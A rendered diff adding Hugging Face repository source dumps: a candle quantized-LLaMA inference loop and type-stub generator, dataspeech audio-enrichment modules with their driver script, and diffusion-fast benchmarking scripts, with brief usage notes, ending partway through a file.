+ print('model built, starting inference')
1312
+ tokens = [1]
1313
+ for token_idx in range(500):
1314
+ last_token = tokens[-1]
1315
+ lt = candle.tensor([last_token]).unsqueeze(0)
1316
+ logits = model.forward(lt, len(tokens))
1317
+ m = logits.get(0).argmax_keepdim(-1)
1318
+ next_token = m.values()[0]
1319
+ print(vocab[next_token], end='', flush=True)
1320
+ tokens.append(next_token)
1321
+ if __name__ == '__main__':
1322
+ main()
1323
+
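The script above takes a single positional weight file, either a GGUF or a legacy GGML checkpoint, and then greedily decodes 500 tokens starting from the BOS token. A possible invocation (the file name is a placeholder):

python quant-llama.py llama-2-7b.Q4_0.gguf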
1324
+ # File: candle-main/candle-pyo3/stub.py
1325
+ import argparse
1326
+ import inspect
1327
+ import os
1328
+ from typing import Optional
1329
+ import black
1330
+ from pathlib import Path
1331
+ import re
1332
+ INDENT = ' ' * 4
1333
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
1334
+ TYPING = 'from typing import Any, Callable, Dict, List, Optional, Tuple, Union, Sequence\nfrom os import PathLike\n'
1335
+ CANDLE_SPECIFIC_TYPING = 'from candle.typing import _ArrayLike, Device, Scalar, Index, Shape\n'
1336
+ CANDLE_TENSOR_IMPORTS = 'from candle import Tensor,DType,QTensor\n'
1337
+ RETURN_TYPE_MARKER = '&RETURNS&: '
1338
+ ADDITIONAL_TYPEHINTS = {}
1339
+ FORWARD_REF_PATTERN = re.compile("ForwardRef\\('([^']+)'\\)")
1340
+
1341
+ def do_indent(text: Optional[str], indent: str):
1342
+ if text is None:
1343
+ return ''
1344
+ return text.replace('\n', f'\n{indent}')
1345
+
1346
+ def function(obj, indent: str, text_signature: str=None):
1347
+ if text_signature is None:
1348
+ text_signature = obj.__text_signature__
1349
+ text_signature = text_signature.replace('$self', 'self').lstrip().rstrip()
1350
+ doc_string = obj.__doc__
1351
+ if doc_string is None:
1352
+ doc_string = ''
1353
+ return_type = None
1354
+ doc_lines = doc_string.split('\n')
1355
+ if doc_lines[-1].lstrip().startswith(RETURN_TYPE_MARKER):
1356
+ return_type = doc_lines[-1].lstrip()[len(RETURN_TYPE_MARKER):].strip()
1357
+ doc_string = '\n'.join(doc_lines[:-1])
1358
+ string = ''
1359
+ if return_type:
1360
+ string += f'{indent}def {obj.__name__}{text_signature} -> {return_type}:\n'
1361
+ else:
1362
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
1363
+ indent += INDENT
1364
+ string += f'{indent}"""\n'
1365
+ string += f'{indent}{do_indent(doc_string, indent)}\n'
1366
+ string += f'{indent}"""\n'
1367
+ string += f'{indent}pass\n'
1368
+ string += '\n'
1369
+ string += '\n'
1370
+ return string
1371
+
1372
+ def member_sort(member):
1373
+ if inspect.isclass(member):
1374
+ value = 10 + len(inspect.getmro(member))
1375
+ else:
1376
+ value = 1
1377
+ return value
1378
+
1379
+ def fn_predicate(obj):
1380
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
1381
+ if value:
1382
+ return obj.__text_signature__ and (not obj.__name__.startswith('_'))
1383
+ if inspect.isgetsetdescriptor(obj):
1384
+ return not obj.__name__.startswith('_')
1385
+ return False
1386
+
1387
+ def get_module_members(module):
1388
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
1389
+ members.sort(key=member_sort)
1390
+ return members
1391
+
1392
+ def pyi_file(obj, indent=''):
1393
+ string = ''
1394
+ if inspect.ismodule(obj):
1395
+ string += GENERATED_COMMENT
1396
+ string += TYPING
1397
+ string += CANDLE_SPECIFIC_TYPING
1398
+ if obj.__name__ != 'candle.candle':
1399
+ string += CANDLE_TENSOR_IMPORTS
1400
+ members = get_module_members(obj)
1401
+ for member in members:
1402
+ string += pyi_file(member, indent)
1403
+ elif inspect.isclass(obj):
1404
+ indent += INDENT
1405
+ mro = inspect.getmro(obj)
1406
+ if len(mro) > 2:
1407
+ inherit = f'({mro[1].__name__})'
1408
+ else:
1409
+ inherit = ''
1410
+ string += f'class {obj.__name__}{inherit}:\n'
1411
+ body = ''
1412
+ if obj.__doc__:
1413
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
1414
+ fns = inspect.getmembers(obj, fn_predicate)
1415
+ if obj.__text_signature__:
1416
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
1417
+ body += f'{indent + INDENT}pass\n'
1418
+ body += '\n'
1419
+ if obj.__name__ in ADDITIONAL_TYPEHINTS:
1420
+ additional_members = inspect.getmembers(ADDITIONAL_TYPEHINTS[obj.__name__])
1421
+ additional_functions = []
1422
+ for (name, member) in additional_members:
1423
+ if inspect.isfunction(member):
1424
+ additional_functions.append((name, member))
1425
+
1426
+ def process_additional_function(fn):
1427
+ signature = inspect.signature(fn)
1428
+ cleaned_signature = re.sub(FORWARD_REF_PATTERN, '\\1', str(signature))
1429
+ string = f'{indent}def {fn.__name__}{cleaned_signature}:\n'
1430
+ string += f'{indent + INDENT}"""{indent + INDENT}{do_indent(fn.__doc__, indent + INDENT)}{indent + INDENT}"""\n'
1431
+ string += f'{indent + INDENT}pass\n'
1432
+ string += '\n'
1433
+ return string
1434
+ for (name, fn) in additional_functions:
1435
+ body += process_additional_function(fn)
1436
+ for (name, fn) in fns:
1437
+ body += pyi_file(fn, indent=indent)
1438
+ if not body:
1439
+ body += f'{indent}pass\n'
1440
+ string += body
1441
+ string += '\n\n'
1442
+ elif inspect.isbuiltin(obj):
1443
+ string += f'{indent}@staticmethod\n'
1444
+ string += function(obj, indent)
1445
+ elif inspect.ismethoddescriptor(obj):
1446
+ string += function(obj, indent)
1447
+ elif inspect.isgetsetdescriptor(obj):
1448
+ string += f'{indent}@property\n'
1449
+ string += function(obj, indent, text_signature='(self)')
1450
+ elif obj.__class__.__name__ == 'DType':
1451
+ string += f'class {str(obj).lower()}(DType):\n'
1452
+ string += f'{indent + INDENT}pass\n'
1453
+ else:
1454
+ raise Exception(f'Object {obj} is not supported')
1455
+ return string
1456
+
1457
+ def py_file(module, origin):
1458
+ members = get_module_members(module)
1459
+ string = GENERATED_COMMENT
1460
+ string += f'from .. import {origin}\n'
1461
+ string += '\n'
1462
+ for member in members:
1463
+ if hasattr(member, '__name__'):
1464
+ name = member.__name__
1465
+ else:
1466
+ name = str(member)
1467
+ string += f'{name} = {origin}.{name}\n'
1468
+ return string
1469
+
1470
+ def do_black(content, is_pyi):
1471
+ mode = black.Mode(target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True)
1472
+ try:
1473
+ return black.format_file_contents(content, fast=True, mode=mode)
1474
+ except black.NothingChanged:
1475
+ return content
1476
+
1477
+ def write(module, directory, origin, check=False):
1478
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
1479
+ filename = os.path.join(directory, '__init__.pyi')
1480
+ pyi_content = pyi_file(module)
1481
+ pyi_content = do_black(pyi_content, is_pyi=True)
1482
+ os.makedirs(directory, exist_ok=True)
1483
+ if check:
1484
+ with open(filename, 'r') as f:
1485
+ data = f.read()
1486
+ print('generated content')
1487
+ print(pyi_content)
1488
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1489
+ else:
1490
+ with open(filename, 'w') as f:
1491
+ f.write(pyi_content)
1492
+ filename = os.path.join(directory, '__init__.py')
1493
+ py_content = py_file(module, origin)
1494
+ py_content = do_black(py_content, is_pyi=False)
1495
+ os.makedirs(directory, exist_ok=True)
1496
+ is_auto = False
1497
+ if not os.path.exists(filename):
1498
+ is_auto = True
1499
+ else:
1500
+ with open(filename, 'r') as f:
1501
+ line = f.readline()
1502
+ if line == GENERATED_COMMENT:
1503
+ is_auto = True
1504
+ if is_auto:
1505
+ if check:
1506
+ with open(filename, 'r') as f:
1507
+ data = f.read()
1508
+ print('generated content')
1509
+ print(py_content)
1510
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1511
+ else:
1512
+ with open(filename, 'w') as f:
1513
+ f.write(py_content)
1514
+ for (name, submodule) in submodules:
1515
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
1516
+
1517
+ def extract_additional_types(module):
1518
+ additional_types = {}
1519
+ for (name, member) in inspect.getmembers(module):
1520
+ if inspect.isclass(member):
1521
+ if hasattr(member, '__name__'):
1522
+ name = member.__name__
1523
+ else:
1524
+ name = str(member)
1525
+ if name not in additional_types:
1526
+ additional_types[name] = member
1527
+ return additional_types
1528
+ if __name__ == '__main__':
1529
+ parser = argparse.ArgumentParser()
1530
+ parser.add_argument('--check', action='store_true')
1531
+ args = parser.parse_args()
1532
+ cwd = Path.cwd()
1533
+ directory = 'py_src/candle/'
1534
+ if cwd.name != 'candle-pyo3':
1535
+ directory = f'candle-pyo3/{directory}'
1536
+ import candle
1537
+ import _additional_typing
1538
+ ADDITIONAL_TYPEHINTS = extract_additional_types(_additional_typing)
1539
+ write(candle.candle, directory, 'candle', check=args.check)
1540
+
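stub.py is meant to be run from the candle-pyo3 directory (or the repository root) to regenerate the type stubs, with --check reserved for verification in CI:

python stub.py           # rewrites py_src/candle/**/__init__.pyi and the auto-generated __init__.py files
python stub.py --check   # asserts that the committed stubs are up to date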
huggingface_controlnet_aux.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_dataset-viewer.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_datasets.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_dataspeech.txt ADDED
@@ -0,0 +1,220 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: dataspeech-main/dataspeech/cpu_enrichments/rate.py
2
+ from g2p import make_g2p
3
+ transducer = make_g2p('eng', 'eng-ipa')
4
+
5
+ def rate_apply(batch, rank=None, audio_column_name='audio', text_column_name='text'):
6
+ if isinstance(batch[text_column_name], list):
7
+ speaking_rates = []
8
+ phonemes_list = []
9
+ if 'speech_duration' in batch:
10
+ for (text, audio_duration) in zip(batch[text_column_name], batch['speech_duration']):
11
+ phonemes = transducer(text).output_string
12
+ audio_duration = audio_duration if audio_duration != 0 else 0.01
13
+ speaking_rate = len(phonemes) / audio_duration
14
+ speaking_rates.append(speaking_rate)
15
+ phonemes_list.append(phonemes)
16
+ else:
17
+ for (text, audio) in zip(batch[text_column_name], batch[audio_column_name]):
18
+ phonemes = transducer(text).output_string
19
+ sample_rate = audio['sampling_rate']
20
+ audio_length = len(audio['array'].squeeze()) / sample_rate
21
+ speaking_rate = len(phonemes) / audio_length
22
+ speaking_rates.append(speaking_rate)
23
+ phonemes_list.append(phonemes)
24
+ batch['speaking_rate'] = speaking_rates
25
+ batch['phonemes'] = phonemes_list
26
+ else:
27
+ phonemes = transducer(batch[text_column_name]).output_string
28
+ if 'speech_duration' in batch:
29
+ audio_length = batch['speech_duration'] if batch['speech_duration'] != 0 else 0.01
30
+ else:
31
+ sample_rate = batch[audio_column_name]['sampling_rate']
32
+ audio_length = len(batch[audio_column_name]['array'].squeeze()) / sample_rate
33
+ speaking_rate = len(phonemes) / audio_length
34
+ batch['speaking_rate'] = speaking_rate
35
+ batch['phonemes'] = phonemes
36
+ return batch
37
+
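rate_apply is designed to be driven through datasets.Dataset.map, mirroring the map calls in main.py further down; the dataset id below is a placeholder.

from datasets import load_dataset

dataset = load_dataset("user/some-speech-dataset", split="train")   # placeholder dataset id
dataset = dataset.map(
    rate_apply,
    batched=True,
    batch_size=16,
    fn_kwargs={"audio_column_name": "audio", "text_column_name": "text"},
)
# adds a 'speaking_rate' column (phonemes per second) and a 'phonemes' column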
38
+ # File: dataspeech-main/dataspeech/gpu_enrichments/pitch.py
39
+ import torch
40
+ import penn
41
+ hopsize = 0.01
42
+ fmin = 30.0
43
+ fmax = 1000.0
44
+ checkpoint = None
45
+ center = 'half-hop'
46
+ interp_unvoiced_at = 0.065
47
+
48
+ def pitch_apply(batch, rank=None, audio_column_name='audio', output_column_name='utterance_pitch', penn_batch_size=4096):
49
+ if isinstance(batch[audio_column_name], list):
50
+ utterance_pitch_mean = []
51
+ utterance_pitch_std = []
52
+ for sample in batch[audio_column_name]:
53
+ (pitch, periodicity) = penn.from_audio(torch.tensor(sample['array'][None, :]).float(), sample['sampling_rate'], hopsize=hopsize, fmin=fmin, fmax=fmax, checkpoint=checkpoint, batch_size=penn_batch_size, center=center, interp_unvoiced_at=interp_unvoiced_at, gpu=(rank or 0) % torch.cuda.device_count() if torch.cuda.device_count() > 0 else rank)
54
+ utterance_pitch_mean.append(pitch.mean().cpu())
55
+ utterance_pitch_std.append(pitch.std().cpu())
56
+ batch[f'{output_column_name}_mean'] = utterance_pitch_mean
57
+ batch[f'{output_column_name}_std'] = utterance_pitch_std
58
+ else:
59
+ sample = batch[audio_column_name]
60
+ (pitch, periodicity) = penn.from_audio(torch.tensor(sample['array'][None, :]).float(), sample['sampling_rate'], hopsize=hopsize, fmin=fmin, fmax=fmax, checkpoint=checkpoint, batch_size=penn_batch_size, center=center, interp_unvoiced_at=interp_unvoiced_at, gpu=(rank or 0) % torch.cuda.device_count() if torch.cuda.device_count() > 0 else rank)
61
+ batch[f'{output_column_name}_mean'] = pitch.mean().cpu()
62
+ batch[f'{output_column_name}_std'] = pitch.std().cpu()
63
+ return batch
64
+
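pitch_apply above runs the penn pitch tracker with a 10 ms hop over each clip and keeps only two scalars per utterance, the mean and standard deviation of the estimated pitch, written to '{output_column_name}_mean' and '{output_column_name}_std' ('utterance_pitch_mean' / 'utterance_pitch_std' by default).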
65
+ # File: dataspeech-main/dataspeech/gpu_enrichments/snr_and_reverb.py
66
+ from pyannote.audio import Model
67
+ from pathlib import Path
68
+ from brouhaha.pipeline import RegressiveActivityDetectionPipeline
69
+ import torch
70
+ from huggingface_hub import hf_hub_download
71
+ import numpy as np
72
+ model = None
73
+ ratio = 16000 / 270
74
+
75
+ def snr_apply(batch, rank=None, audio_column_name='audio', batch_size=32):
76
+ global model
77
+ if model is None:
78
+ model = Model.from_pretrained(Path(hf_hub_download(repo_id='ylacombe/brouhaha-best', filename='best.ckpt')), strict=False)
79
+ if rank is not None or torch.cuda.device_count() > 0:
80
+ device = f'cuda:{(rank or 0) % torch.cuda.device_count()}'
81
+ model.to(device)
82
+ pipeline = RegressiveActivityDetectionPipeline(segmentation=model, batch_size=batch_size)
83
+ if rank:
84
+ pipeline.to(torch.device(device))
85
+ device = pipeline._models['segmentation'].device
86
+ if isinstance(batch[audio_column_name], list):
87
+ snr = []
88
+ c50 = []
89
+ vad_durations = []
90
+ for sample in batch[audio_column_name]:
91
+ res = pipeline({'sample_rate': sample['sampling_rate'], 'waveform': torch.tensor(sample['array'][None, :]).to(device).float()})
92
+ mask = np.full(res['snr'].shape, False)
93
+ for (segment, _) in res['annotation'].itertracks():
94
+ start = int(segment.start * ratio)
95
+ end = int(segment.end * ratio)
96
+ mask[start:end] = True
97
+ mask = ~((res['snr'] == 0.0) & (res['c50'] == 0.0)) & mask
98
+ vad_duration = sum(map(lambda x: x[0].duration, res['annotation'].itertracks()))
99
+ snr.append(res['snr'][mask].mean())
100
+ c50.append(res['c50'][mask].mean())
101
+ vad_durations.append(np.float32(vad_duration))
102
+ batch['snr'] = snr
103
+ batch['c50'] = c50
104
+ batch['speech_duration'] = vad_durations
105
+ else:
106
+ res = pipeline({'sample_rate': batch[audio_column_name]['sampling_rate'], 'waveform': torch.tensor(batch[audio_column_name]['array'][None, :]).to(device).float()})
107
+ mask = np.full(res['snr'].shape, False)
108
+ for (segment, _) in res['annotation'].itertracks():
109
+ start = int(segment.start * ratio)
110
+ end = int(segment.end * ratio)
111
+ mask[start:end] = True
112
+ mask = ~((res['snr'] == 0.0) & (res['c50'] == 0.0)) & mask
113
+ vad_duration = sum(map(lambda x: x[0].duration, res['annotation'].itertracks()))
114
+ batch['snr'] = res['snr'][mask].mean()
115
+ batch['c50'] = res['c50'][mask].mean()
116
+ batch['speech_duration'] = vad_duration
117
+ return batch
118
+
119
+ # File: dataspeech-main/dataspeech/gpu_enrichments/squim.py
120
+ from torchaudio.pipelines import SQUIM_OBJECTIVE
121
+ import torch
122
+ import torchaudio
123
+ model = None
124
+ max_audio_length = 15 * SQUIM_OBJECTIVE.sample_rate
125
+
126
+ def squim_apply(batch, rank=None, audio_column_name='audio'):
127
+ global model
128
+ if model is None:
129
+ model = SQUIM_OBJECTIVE.get_model()
130
+ if rank is not None or torch.cuda.device_count() > 0:
131
+ device = f'cuda:{(rank or 0) % torch.cuda.device_count()}'
132
+ model.to(device)
133
+ else:
134
+ device = 'cpu'
135
+ if isinstance(batch[audio_column_name], list):
136
+ sdr = []
137
+ pesq = []
138
+ stoi = []
139
+ for sample in batch[audio_column_name]:
140
+ waveform = torchaudio.functional.resample(torch.tensor(sample['array'])[None, :].to(device).float(), sample['sampling_rate'], SQUIM_OBJECTIVE.sample_rate)
141
+ with torch.no_grad():
142
+ waveform = waveform[:, :min(max_audio_length, waveform.shape[1])]
143
+ (stoi_sample, pesq_sample, sdr_sample) = model(waveform)
144
+ sdr.append(sdr_sample.cpu()[0])
145
+ pesq.append(pesq_sample.cpu()[0])
146
+ stoi.append(stoi_sample.cpu()[0])
147
+ batch['sdr'] = sdr
148
+ batch['pesq'] = pesq
149
+ batch['stoi'] = stoi
150
+ else:
151
+ waveform = torchaudio.functional.resample(torch.tensor(batch[audio_column_name]['array'][None, :]).to(device).float(), batch[audio_column_name]['sampling_rate'], SQUIM_OBJECTIVE.sample_rate)
152
+ with torch.no_grad():
153
+ (stoi_sample, pesq_sample, sdr_sample) = model(waveform)
154
+ batch['sdr'] = sdr_sample.cpu()[0]
155
+ batch['pesq'] = pesq_sample.cpu()[0]
156
+ batch['stoi'] = stoi_sample.cpu()[0]
157
+ return batch
158
+
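squim_apply above resamples each clip to SQUIM_OBJECTIVE.sample_rate, truncates it to max_audio_length (15 s of audio), and stores the model's reference-free quality estimates in the 'sdr', 'pesq' and 'stoi' columns.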
159
+ # File: dataspeech-main/main.py
160
+ from datasets import load_dataset, Audio
161
+ from multiprocess import set_start_method
162
+ from dataspeech import rate_apply, pitch_apply, snr_apply, squim_apply
163
+ import torch
164
+ import argparse
165
+ if __name__ == '__main__':
166
+ set_start_method('spawn')
167
+ parser = argparse.ArgumentParser()
168
+ parser.add_argument('dataset_name', type=str, help='Path or name of the dataset. See: https://huggingface.co/docs/datasets/v2.17.0/en/package_reference/loading_methods#datasets.load_dataset.path')
169
+ parser.add_argument('--configuration', default=None, type=str, help='Dataset configuration to use, if necessary.')
170
+ parser.add_argument('--output_dir', default=None, type=str, help='If specified, save the dataset on disk with this path.')
171
+ parser.add_argument('--repo_id', default=None, type=str, help='If specified, push the dataset to the hub.')
172
+ parser.add_argument('--audio_column_name', default='audio', type=str, help='Column name of the audio column to be enriched.')
173
+ parser.add_argument('--text_column_name', default='text', type=str, help='Text column name.')
174
+ parser.add_argument('--rename_column', action='store_true', help="If activated, rename audio and text column names to 'audio' and 'text'. Useful if you want to merge datasets afterwards.")
175
+     parser.add_argument('--cpu_num_workers', default=1, type=int, help="Number of CPU workers for transformations that don't use GPUs or if no GPUs are available.")
176
+ parser.add_argument('--cpu_writer_batch_size', default=1000, type=int, help="writer_batch_size for transformations that don't use GPUs. See: https://huggingface.co/docs/datasets/v2.17.0/en/package_reference/main_classes#datasets.Dataset.map.writer_batch_size")
177
+     parser.add_argument('--batch_size', default=2, type=int, help='This parameter specifies how many samples are passed by workers for operations that use GPUs.')
178
+     parser.add_argument('--penn_batch_size', default=4096, type=int, help="Pitch estimation chunks audio into smaller pieces and processes them in batches. This specifies the batch size. If you are using a GPU, pick a batch size that doesn't cause memory errors.")
179
+     parser.add_argument('--num_workers_per_gpu_for_pitch', default=1, type=int, help='Number of workers per GPU for the pitch estimation if GPUs are available. Defaults to 1 if some are available. Useful if you want multiple processes per GPU to maximise GPU usage.')
180
+     parser.add_argument('--num_workers_per_gpu_for_snr', default=1, type=int, help='Number of workers per GPU for the SNR and reverberation estimation if GPUs are available. Defaults to 1 if some are available. Useful if you want multiple processes per GPU to maximise GPU usage.')
181
+ parser.add_argument('--apply_squim_quality_estimation', action='store_true', help='If set, will also use torchaudio-squim estimation (SI-SNR, STOI and PESQ).')
182
+     parser.add_argument('--num_workers_per_gpu_for_squim', default=1, type=int, help='Number of workers per GPU for the SI-SNR, STOI and PESQ estimation if GPUs are available. Defaults to 1 if some are available. Useful if you want multiple processes per GPU to maximise GPU usage.')
183
+ args = parser.parse_args()
184
+ if args.configuration:
185
+ dataset = load_dataset(args.dataset_name, args.configuration, num_proc=args.cpu_num_workers)
186
+ else:
187
+ dataset = load_dataset(args.dataset_name, num_proc=args.cpu_num_workers)
188
+ audio_column_name = 'audio' if args.rename_column else args.audio_column_name
189
+ text_column_name = 'text' if args.rename_column else args.text_column_name
190
+ if args.rename_column:
191
+ dataset = dataset.rename_columns({args.audio_column_name: 'audio', args.text_column_name: 'text'})
192
+ if args.apply_squim_quality_estimation:
193
+ print('Compute SI-SDR, PESQ, STOI')
194
+ squim_dataset = dataset.map(squim_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_squim if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name})
195
+ print('Compute pitch')
196
+ pitch_dataset = dataset.cast_column(audio_column_name, Audio(sampling_rate=16000)).map(pitch_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_pitch if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name, 'penn_batch_size': args.penn_batch_size})
197
+ print('Compute snr and reverb')
198
+ snr_dataset = dataset.map(snr_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_snr if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name})
199
+ print('Compute speaking rate')
200
+ if 'speech_duration' in snr_dataset[next(iter(snr_dataset.keys()))].features:
201
+ rate_dataset = snr_dataset.map(rate_apply, with_rank=False, num_proc=args.cpu_num_workers, writer_batch_size=args.cpu_writer_batch_size, fn_kwargs={'audio_column_name': audio_column_name, 'text_column_name': text_column_name})
202
+ else:
203
+ rate_dataset = dataset.map(rate_apply, with_rank=False, num_proc=args.cpu_num_workers, writer_batch_size=args.cpu_writer_batch_size, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name, 'text_column_name': text_column_name})
204
+ for split in dataset.keys():
205
+ dataset[split] = pitch_dataset[split].add_column('snr', snr_dataset[split]['snr']).add_column('c50', snr_dataset[split]['c50'])
206
+ if 'speech_duration' in snr_dataset[split]:
207
+ dataset[split] = dataset[split].add_column('speech_duration', snr_dataset[split]['speech_duration'])
208
+ dataset[split] = dataset[split].add_column('speaking_rate', rate_dataset[split]['speaking_rate']).add_column('phonemes', rate_dataset[split]['phonemes'])
209
+ if args.apply_squim_quality_estimation:
210
+ dataset[split] = dataset[split].add_column('stoi', squim_dataset[split]['stoi']).add_column('si-sdr', squim_dataset[split]['sdr']).add_column('pesq', squim_dataset[split]['pesq'])
211
+ if args.output_dir:
212
+ print('Saving to disk...')
213
+ dataset.save_to_disk(args.output_dir)
214
+ if args.repo_id:
215
+ print('Pushing to the hub...')
216
+ if args.configuration:
217
+ dataset.push_to_hub(args.repo_id, args.configuration)
218
+ else:
219
+ dataset.push_to_hub(args.repo_id)
220
+
huggingface_datatrove.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_diffusers.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_diffusion-fast.txt ADDED
@@ -0,0 +1,160 @@
1
+ # File: diffusion-fast-main/prepare_results.py
2
+ import argparse
3
+ import glob
4
+ import os
5
+ import sys
6
+ import matplotlib.pyplot as plt
7
+ import pandas as pd
8
+ import seaborn as sns
9
+ from huggingface_hub import upload_file
10
+ sys.path.append('.')
11
+ from utils.benchmarking_utils import collate_csv
12
+ REPO_ID = 'sayakpaul/sample-datasets'
13
+
14
+ def prepare_plot(df, args):
15
+ columns_to_drop = ['batch_size', 'num_inference_steps', 'pipeline_cls', 'ckpt_id', 'upcast_vae', 'memory (gbs)', 'actual_gpu_memory (gbs)', 'tag']
16
+ df_filtered = df.drop(columns=columns_to_drop)
17
+ df_filtered[['quant']] = df_filtered[['do_quant']].fillna('None')
18
+ df_filtered.drop(columns=['do_quant'], inplace=True)
19
+ df_filtered['settings'] = df_filtered.apply(lambda row: ', '.join([f'{col}-{row[col]}' for col in df_filtered.columns if col != 'time (secs)']), axis=1)
20
+ df_filtered['formatted_settings'] = df_filtered['settings'].str.replace(', ', '\n', regex=False)
21
+ df_filtered.loc[0, 'formatted_settings'] = 'default'
22
+ plt.figure(figsize=(12, 10))
23
+ sns.set_style('whitegrid')
24
+ n_settings = len(df_filtered['formatted_settings'].unique())
25
+ bar_positions = range(n_settings)
26
+ palette = sns.color_palette('husl', n_settings)
27
+ bar_width = 0.25
28
+ for (i, setting) in enumerate(df_filtered['formatted_settings'].unique()):
29
+ mean_time = df_filtered[df_filtered['formatted_settings'] == setting]['time (secs)'].mean()
30
+ plt.bar(i, mean_time, width=bar_width, align='center', color=palette[i])
31
+ plt.text(i, mean_time + 0.01, f'{mean_time:.2f}', ha='center', va='bottom', fontsize=14, fontweight='bold')
32
+ plt.xticks(bar_positions, df_filtered['formatted_settings'].unique(), rotation=45, ha='right', fontsize=10)
33
+ plt.ylabel('Time in Seconds', fontsize=14, labelpad=15)
34
+ plt.xlabel('Settings', fontsize=14, labelpad=15)
35
+ plt.title(args.plot_title, fontsize=18, fontweight='bold', pad=20)
36
+ plt.grid(axis='y', linestyle='--', linewidth=0.7, alpha=0.7)
37
+ plt.tight_layout()
38
+ plt.subplots_adjust(top=0.9, bottom=0.2)
39
+ plot_path = args.plot_title.replace(' ', '_') + '.png'
40
+ plt.savefig(plot_path, bbox_inches='tight', dpi=300)
41
+ if args.push_to_hub:
42
+ upload_file(repo_id=REPO_ID, path_in_repo=plot_path, path_or_fileobj=plot_path, repo_type='dataset')
43
+         print(f'Plot successfully uploaded. Find it here: https://huggingface.co/datasets/{REPO_ID}/blob/main/{plot_path}')
44
+ plt.show()
45
+
46
+ def main(args):
47
+ all_csvs = sorted(glob.glob(f'{args.base_path}/*.csv'))
48
+ all_csvs = [os.path.join(args.base_path, x) for x in all_csvs]
49
+ is_pixart = 'PixArt-alpha' in all_csvs[0]
50
+ collate_csv(all_csvs, args.final_csv_filename, is_pixart=is_pixart)
51
+ if args.push_to_hub:
52
+ upload_file(repo_id=REPO_ID, path_in_repo=args.final_csv_filename, path_or_fileobj=args.final_csv_filename, repo_type='dataset')
53
+ print(f'CSV successfully uploaded. Find it here: https://huggingface.co/datasets/{REPO_ID}/blob/main/{args.final_csv_filename}')
54
+ if args.plot_title is not None:
55
+ df = pd.read_csv(args.final_csv_filename)
56
+ prepare_plot(df, args)
57
+ if __name__ == '__main__':
58
+ parser = argparse.ArgumentParser()
59
+ parser.add_argument('--base_path', type=str, default='.')
60
+ parser.add_argument('--final_csv_filename', type=str, default='collated_results.csv')
61
+ parser.add_argument('--plot_title', type=str, default=None)
62
+ parser.add_argument('--push_to_hub', action='store_true')
63
+ args = parser.parse_args()
64
+ main(args)
65
+
66
+ # File: diffusion-fast-main/run_benchmark.py
67
+ import torch
68
+ torch.set_float32_matmul_precision('high')
69
+ import sys
70
+ sys.path.append('.')
71
+ from utils.benchmarking_utils import benchmark_fn, create_parser, generate_csv_dict, write_to_csv
72
+ from utils.pipeline_utils import load_pipeline
73
+
74
+ def run_inference(pipe, args):
75
+ _ = pipe(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size)
76
+
77
+ def main(args) -> dict:
78
+ pipeline = load_pipeline(ckpt=args.ckpt, compile_unet=args.compile_unet, compile_vae=args.compile_vae, no_sdpa=args.no_sdpa, no_bf16=args.no_bf16, upcast_vae=args.upcast_vae, enable_fused_projections=args.enable_fused_projections, do_quant=args.do_quant, compile_mode=args.compile_mode, change_comp_config=args.change_comp_config, device=args.device)
79
+ run_inference(pipeline, args)
80
+ run_inference(pipeline, args)
81
+ run_inference(pipeline, args)
82
+ time = benchmark_fn(run_inference, pipeline, args)
83
+ data_dict = generate_csv_dict(pipeline_cls=str(pipeline.__class__.__name__), args=args, time=time)
84
+ img = pipeline(prompt=args.prompt, num_inference_steps=args.num_inference_steps, num_images_per_prompt=args.batch_size).images[0]
85
+ return (data_dict, img)
86
+ if __name__ == '__main__':
87
+ parser = create_parser()
88
+ args = parser.parse_args()
89
+ print(args)
90
+ (data_dict, img) = main(args)
91
